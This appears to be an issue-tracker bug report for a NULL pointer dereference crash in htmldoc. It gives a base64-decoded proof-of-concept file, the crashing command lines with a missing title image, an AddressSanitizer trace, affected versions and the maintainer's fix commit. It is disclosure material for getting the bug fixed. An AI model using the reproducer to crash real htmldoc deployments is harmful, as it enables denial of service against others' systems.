NULL Pointer Dereference (SIGSEGV)

[chameleon10712]

Description

Null pointer dereference in htmldoc

Proof of Concept

echo -ne "PEhUTUw+CjxIRUFEPgoJPFRJVExFPkF0dHJpYnV0ZXMgVGVzdHM8L1RJVExFPgo8L0hFQUQ+CjxCT0RZPgoKPEgxPkF0dHJpYnV0ZXMgVGVzdHM8L0gxPgoKPFA+PFNNQUxMPlNtYWxsPC9TTUFMTD4gTm9ybWFsIDxCSUc+QmlnPC9CSUc+CjxQPjxCPkJvbGQ8L0I+CjxQPjxJPkl0YWxpYzwvST4KPFA+PEI+PEk+Qm9sZC1JdGFsaWM8L0k+PC9CPgo8UD48VT5VbmRlcmxpbmU8L1U+CjxQPjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPgo8SDE+PFNUUklLRT5TdHJpa2V0aHJvdWdoPC9TVFJJS0U+PC9IMT4KPEgyPjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPjwvSDI+CjxIMz48U1RSSUtFPlN0cmlrZXRocm91Z2g8L1NUUklLRT48L0gzPgo8SDQ+PFNUUklLRT5TdHJpa2V0aHJvdWdoPC9TVFJJS0U+PC9IND4KPEg1PjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPjwvSDU+CjxINj48U1RSSUtFPlN0cmlrZXRocm91Z2g8L1NUUklLRT48L0g2PgoKPEgxPlNVQi9TVVAgVGVzdDwvSDE+Cgo8UD5Ob3JtYWw8U1VQPlN1cGVyc2NyaXB0PC9TVVA+CjxQPk5vcm1hbDxTVUI+U3Vic2NyaXB0PC9TVUI+Cgo8SDE+Tm9uLUJyZWFraW5nIFNwYWNlIFRlc3Q8L0gxPgoKPFA+VGhlIGludmVzdG1lbnQgb2JqZWN0aXZlcyB3aGljaCBiZXN0IGRlc2NyaWJlIHRoaXMKcG9ydGZvbGlvOiZuYnNwOyZuYnNwOzx1Pk1heGltdW0gR3Jvd3RoPC91PjogbWF4aW11bSBjYXBpdGFsCmFwcHJlY2lhdGlvbiB3aXRoIGhpZ2hlciByaXNrL3ZvbGF0aWxpdHkgYW5kIG5vIGluY29tZS4KCjwvQk9EWT4KPC9IVE1MPgo=" | base64 -d > poc

normal build

$ /home/oceane/fuzz_test/htmldoc/build_norm/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book  --format html  --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
fish: “/home/oceane/fuzz_test/htmldoc/…” terminated by signal SIGSEGV (Address boundary error)

build with ASAN

$ /home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book  --format html  --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2118150==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000404 (pc 0x5557dcbbcf60 bp 0x7ffd3d4117e0 sp 0x7ffd3d411770 T0)
==2118150==The signal is caused by a READ memory access.
==2118150==Hint: address points to the zero page.
    #0 0x5557dcbbcf5f  (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
    #1 0x5557dcb62d36  (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x48d36)
    #2 0x7fc8b2037082 in __libc_start_main ../csu/libc-start.c:308
    #3 0x5557dcb6c8ad  (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x528ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
==2118150==ABORTING

git commit a4b0dfe5c
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
g++ (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
Ubuntu 20.04.6 LTS
Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz

Affected Version

• git commit a4b0dfe
• v1.9.16
• v1.9.15

Impact

• Denial of Service
• NULL Pointer Dereference

[michaelrsweet]

[master 07c63af] Fix a crash bug with a bad title image (Issue #510)